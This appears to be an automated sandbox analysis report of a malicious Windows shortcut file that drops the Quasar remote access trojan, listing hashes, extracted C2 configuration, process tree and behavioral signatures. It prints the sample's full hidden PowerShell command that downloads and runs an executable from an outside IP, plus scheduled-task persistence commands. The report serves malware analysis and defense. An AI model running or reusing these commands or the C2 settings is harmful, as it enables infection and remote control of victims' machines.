Analysis
-
max time kernel
147s -
max time network
155s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
03-11-2024 04:03
Static task
static1
Behavioral task
behavioral1
Sample
e29b86ad063e26d4f88cc123f784983f542357cf922f296813b615c3d0d80a00.lnk
Resource
win7-20240903-en
General
-
Target
e29b86ad063e26d4f88cc123f784983f542357cf922f296813b615c3d0d80a00.lnk
-
Size
2KB
-
MD5
04e779f16953e15b609dfab5be6ebd26
-
SHA1
d0e0b98da3f2ee3b0f8346d511436891380dd4f6
-
SHA256
e29b86ad063e26d4f88cc123f784983f542357cf922f296813b615c3d0d80a00
-
SHA512
4e1967297fb67949b14b16fe8f1d8292360b94602e9da4871476bd7bba84c2cc013bc1b1cedff029c8b01b81f357657919cddcc030ad783a4e61a8db2e5b564b
Malware Config
Extracted
http://45.149.241.169:5336/ghsjfsgfjsyhsfhzgbdfbgzgfb/yugygfyjsbdfoesrjfzbhffbserhbwdewbrtsnbdjkfbrhjgvghvhgvhgvhgvHfgcNchgfcnhchgchgcnGfcngcgdcngchcngch/jhbhfbjadhghjvgfcxhhfcjtgvkhdfskjdkbzhdfhmzdkydbfvhzdfjgvhzvg/tfvjtcfgchgcgcHcgcftjcgtygvgFtrdcjfcgkhvGcjfcxhfcjgVK/chfgcx.exe
Extracted
quasar
1.3.0.0
VTROY
31.13.224.12:61512
31.13.224.13:61513
QSR_MUTEX_4Q2rJqiVyC7hohzbjx
-
encryption_key
7Vp2dMCHrMjJthQ2Elyy
-
install_name
downloads.exe
-
log_directory
Logs
-
reconnect_delay
5000
-
startup_key
cssrse.exe
-
subdirectory
downloadupdates
Signatures
-
Quasar family
-
Quasar payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/2592-58-0x0000000000400000-0x000000000045E000-memory.dmp family_quasar behavioral1/memory/2592-62-0x0000000000400000-0x000000000045E000-memory.dmp family_quasar behavioral1/memory/2592-61-0x0000000000400000-0x000000000045E000-memory.dmp family_quasar -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 4 2668 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Executes dropped EXE 8 IoCs
Processes:
ajtjewc.exeajtjewc.exeajtjewc.exeajtjewc.exedownloads.exedownloads.exedownloads.exedownloads.exepid Process 2564 ajtjewc.exe 2592 ajtjewc.exe 2660 ajtjewc.exe 2828 ajtjewc.exe 3056 downloads.exe 2212 downloads.exe 2916 downloads.exe 1776 downloads.exe -
Loads dropped DLL 4 IoCs
Processes:
ajtjewc.exeajtjewc.exepid Process 2564 ajtjewc.exe 2564 ajtjewc.exe 2564 ajtjewc.exe 2660 ajtjewc.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 5 ip-api.com -
Suspicious use of SetThreadContext 6 IoCs
Processes:
ajtjewc.exedownloads.exedescription pid Process procid_target PID 2564 set thread context of 2592 2564 ajtjewc.exe 34 PID 2564 set thread context of 2660 2564 ajtjewc.exe 35 PID 2564 set thread context of 2828 2564 ajtjewc.exe 36 PID 3056 set thread context of 2212 3056 downloads.exe 41 PID 3056 set thread context of 2916 3056 downloads.exe 42 PID 3056 set thread context of 1776 3056 downloads.exe 43 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
ajtjewc.exedownloads.exeajtjewc.exeajtjewc.exedownloads.exedownloads.exedownloads.exeschtasks.exeajtjewc.exeschtasks.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ajtjewc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language downloads.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ajtjewc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ajtjewc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language downloads.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language downloads.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language downloads.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ajtjewc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid Process 2716 schtasks.exe 1632 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 2668 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exeajtjewc.exeajtjewc.exedownloads.exedownloads.exedescription pid Process Token: SeDebugPrivilege 2668 powershell.exe Token: SeDebugPrivilege 2564 ajtjewc.exe Token: SeDebugPrivilege 2660 ajtjewc.exe Token: SeDebugPrivilege 3056 downloads.exe Token: SeDebugPrivilege 2916 downloads.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeajtjewc.exeajtjewc.exedownloads.exedescription pid Process procid_target PID 2024 wrote to memory of 2668 2024 cmd.exe 32 PID 2024 wrote to memory of 2668 2024 cmd.exe 32 PID 2024 wrote to memory of 2668 2024 cmd.exe 32 PID 2668 wrote to memory of 2564 2668 powershell.exe 33 PID 2668 wrote to memory of 2564 2668 powershell.exe 33 PID 2668 wrote to memory of 2564 2668 powershell.exe 33 PID 2668 wrote to memory of 2564 2668 powershell.exe 33 PID 2564 wrote to memory of 2592 2564 ajtjewc.exe 34 PID 2564 wrote to memory of 2592 2564 ajtjewc.exe 34 PID 2564 wrote to memory of 2592 2564 ajtjewc.exe 34 PID 2564 wrote to memory of 2592 2564 ajtjewc.exe 34 PID 2564 wrote to memory of 2592 2564 ajtjewc.exe 34 PID 2564 wrote to memory of 2592 2564 ajtjewc.exe 34 PID 2564 wrote to memory of 2592 2564 ajtjewc.exe 34 PID 2564 wrote to memory of 2592 2564 ajtjewc.exe 34 PID 2564 wrote to memory of 2592 2564 ajtjewc.exe 34 PID 2564 wrote to memory of 2660 2564 ajtjewc.exe 35 PID 2564 wrote to memory of 2660 2564 ajtjewc.exe 35 PID 2564 wrote to memory of 2660 2564 ajtjewc.exe 35 PID 2564 wrote to memory of 2660 2564 ajtjewc.exe 35 PID 2564 wrote to memory of 2660 2564 ajtjewc.exe 35 PID 2564 wrote to memory of 2660 2564 ajtjewc.exe 35 PID 2564 wrote to memory of 2660 2564 ajtjewc.exe 35 PID 2564 wrote to memory of 2660 2564 ajtjewc.exe 35 PID 2564 wrote to memory of 2660 2564 ajtjewc.exe 35 PID 2564 wrote to memory of 2828 2564 ajtjewc.exe 36 PID 2564 wrote to memory of 2828 2564 ajtjewc.exe 36 PID 2564 wrote to memory of 2828 2564 ajtjewc.exe 36 PID 2564 wrote to memory of 2828 2564 ajtjewc.exe 36 PID 2564 wrote to memory of 2828 2564 ajtjewc.exe 36 PID 2564 wrote to memory of 2828 2564 ajtjewc.exe 36 PID 2564 wrote to memory of 2828 2564 ajtjewc.exe 36 PID 2564 wrote to memory of 2828 2564 ajtjewc.exe 36 PID 2564 wrote to memory of 2828 2564 ajtjewc.exe 36 PID 2660 wrote to memory of 2716 2660 ajtjewc.exe 38 PID 2660 wrote to memory of 2716 2660 ajtjewc.exe 38 PID 2660 wrote to memory of 2716 2660 ajtjewc.exe 38 PID 2660 wrote to memory of 2716 2660 ajtjewc.exe 38 PID 2660 wrote to memory of 3056 2660 ajtjewc.exe 40 PID 2660 wrote to memory of 3056 2660 ajtjewc.exe 40 PID 2660 wrote to memory of 3056 2660 ajtjewc.exe 40 PID 2660 wrote to memory of 3056 2660 ajtjewc.exe 40 PID 3056 wrote to memory of 2212 3056 downloads.exe 41 PID 3056 wrote to memory of 2212 3056 downloads.exe 41 PID 3056 wrote to memory of 2212 3056 downloads.exe 41 PID 3056 wrote to memory of 2212 3056 downloads.exe 41 PID 3056 wrote to memory of 2212 3056 downloads.exe 41 PID 3056 wrote to memory of 2212 3056 downloads.exe 41 PID 3056 wrote to memory of 2212 3056 downloads.exe 41 PID 3056 wrote to memory of 2212 3056 downloads.exe 41 PID 3056 wrote to memory of 2212 3056 downloads.exe 41 PID 3056 wrote to memory of 2916 3056 downloads.exe 42 PID 3056 wrote to memory of 2916 3056 downloads.exe 42 PID 3056 wrote to memory of 2916 3056 downloads.exe 42 PID 3056 wrote to memory of 2916 3056 downloads.exe 42 PID 3056 wrote to memory of 2916 3056 downloads.exe 42 PID 3056 wrote to memory of 2916 3056 downloads.exe 42 PID 3056 wrote to memory of 2916 3056 downloads.exe 42 PID 3056 wrote to memory of 2916 3056 downloads.exe 42 PID 3056 wrote to memory of 2916 3056 downloads.exe 42 PID 3056 wrote to memory of 1776 3056 downloads.exe 43 PID 3056 wrote to memory of 1776 3056 downloads.exe 43 PID 3056 wrote to memory of 1776 3056 downloads.exe 43 PID 3056 wrote to memory of 1776 3056 downloads.exe 43
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\e29b86ad063e26d4f88cc123f784983f542357cf922f296813b615c3d0d80a00.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hIdDEn Hiddden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('http://45.149.241.169:5336/ghsjfsgfjsyhsfhzgbdfbgzgfb/yugygfyjsbdfoesrjfzbhffbserhbwdewbrtsnbdjkfbrhjgvghvhgvhgvhgvHfgcNchgfcnhchgchgcnGfcngcgdcngchcngch/jhbhfbjadhghjvgfcxhhfcjtgvkhdfskjdkbzhdfhmzdkydbfvhzdfjgvhzvg/tfvjtcfgchgcgcHcgcftjcgtygvgFtrdcjfcgkhvGcjfcxhfcjgVK/chfgcx.exe','ajtjewc.exe');./'ajtjewc.exe';(get-item 'ajtjewc.exe').Attributes += 'Hidden';2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Users\Admin\AppData\Local\Temp\ajtjewc.exe"C:\Users\Admin\AppData\Local\Temp\ajtjewc.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Users\Admin\AppData\Local\Temp\ajtjewc.exeC:\Users\Admin\AppData\Local\Temp\ajtjewc.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2592
-
-
C:\Users\Admin\AppData\Local\Temp\ajtjewc.exeC:\Users\Admin\AppData\Local\Temp\ajtjewc.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "cssrse.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\ajtjewc.exe" /rl HIGHEST /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2716
-
-
C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe"C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exeC:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2212
-
-
C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exeC:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2916 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "cssrse.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe" /rl HIGHEST /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1632
-
-
-
C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exeC:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1776
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ajtjewc.exeC:\Users\Admin\AppData\Local\Temp\ajtjewc.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2828
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
773KB
MD5ea087d683bf86b06b48b797d7ec7a4f0
SHA119c673fbb29b58c82eaa1b398d8b2c13d82024ad
SHA2561030615e0ef4b461b68d47bfd787236866c98d3b4598b8e5ef56941b73cc3a9c
SHA512ea78497907f7d7e5c49a30c130b6bb4ebdd529cf4a10f4b71b2987085a0dd4c4600de7ca376d25bd85bdea941b4516457c09b6114e3df40b24acfbaa83c2e64a